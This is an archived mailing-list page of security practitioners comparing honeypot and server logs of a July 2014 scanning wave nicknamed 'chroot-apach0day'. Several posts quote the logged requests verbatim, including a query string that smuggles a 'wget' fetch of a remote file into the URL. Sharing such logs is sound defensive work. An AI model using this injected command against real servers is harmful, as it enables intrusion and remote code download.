PaulDotCom Mailing List

General discussion of security news, research, vulnerabilities, and the PaulDotCom Security Weekly podcast.

List Archives

Jan–Mar | Apr–Jun | Jul–Sep | Oct–Dec
2014821063
2013283349100161
2012253255294288
2011433403313168
20101040730620463
20097136151233889
2008548

Latest Posts

Re: [Security Weekly] Bad c# encryption class Robin Wood (Jul 30)
I got one in the end. I was creating an app in DotNet that I wanted someone
to decompile, then find and extract the encryption/decryption class so they
could use it to interact with the system.

Can't remember where I found it, but I got a nice, self-contained class that
was too complex to easily analyse but was easy to just build into my app.

Robin

Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 29)
Here is the ISC diary on the hits, doesn't add anything new at the moment
but keep an eye on the comments just in case.

https://isc.sans.edu/forums/diary/Interesting+HTTP+User+Agent+chroot-apach0day/18453

Robin

Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 29)
This looks to me like an attempt to troll the Internet into thinking
someone has an EPIC botnet based on an Apache 0 day. All I saw in the
one packet capture I got was a plain request with a suspicious URI, UA
and referrer. No obvious payload or anything else interesting. Reminds
me of the whole GET /w00tw00t.at.ISC.SANS.DFind:) thing.

Jim

Re: [Security Weekly] apache chroot 0day? Bruno Savioli (Jul 29)
I got the same on 7 different servers.
Plus, I also had this, from the same IP on 25/06 on 3 of my servers:

GET /rutorrent HTTP/1.0 User-Agent: Chrome 14.2.0 Mozilla (Gecko)Accept: */*

Bruno

Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 29)
On 28.07.2014 21:26, Lutz Schildt wrote:

Another one:

GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget
proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB
Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED

Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 29)
are scanning the internet (I own the site in question, proxypipe.com)

Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 29)
I was hit this morning about 635 GMT+1 from 162.253.66.77

My site is just a simple honeypot type site, nothing special just logs hits.

Robin

Re: [Security Weekly] apache chroot 0day? Oleg Laskin (Jul 29)
Would this be a reverse honeypot ? :)

I just got a hit also on my sensor:

162.253.66.77 - - [28/Jul/2014:17:54:00 +0000] "GET
/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day;
HTTP/1.0" 200 8687 "-" "chroot-apach0day"

Oleg.

Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 29)
I've seen the same request on one of my honeypots and a second one a few hours later from the same IP:

GET/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day
Referrer: /xA/x0a/x06

Re: [Security Weekly] apache chroot 0day? Ken Pryor (Jul 29)
I host three sites on Digital Ocean. Just checked my Apache logs and I got
hits from this too.

Ken Pryor

Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 28)
Looks like an attempt by somebody to troll us sadly :/

Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 28)
It didn't take long to get a pcap of this request, I started httpd on
a random VPS of mine and it's the only request I have received so far.
At first glance it doesn't seem like anything special.

Jim

Re: [Security Weekly] apache chroot 0day? Ben Jackson (Jul 28)
Nice find Robin! This hit each and every one of my honeypots. Same
request. Really weird.

Here is what TShark shows me off one of my pcaps:

----
Node 0: 162.253.66.77:41790
Node 1: LOLHONEYPOT:80
139
GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day
Referrer: /xA/x0a/x05

300
HTTP/1.1 200 OK
Date: Mon, 28 Jul 2014 05:38:48 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Wed,...

Re: [Security Weekly] apache chroot 0day? xgermx (Jul 28)
Seeing hits from 16X.XXX.XX.X7
Based on the name, I'd have to guess reflective DNS DDoS
Registrant phone for proxypipe.com is +1.8557769900 which actually works
and an IVR picks up :) I selected option 2 for tech support to complain
that the other kidz are laughing at my lame apache 0day but, my call was
shunted.

xgermx

Re: [Security Weekly] apache chroot 0day? Xavier Mertens (Jul 28)
+1
One site was scanned at 07:55 (GMT+1)
The site was a mailman front-end. And yours?

/x

More Lists

Dozens of other network security lists are archived at SecLists.Org.

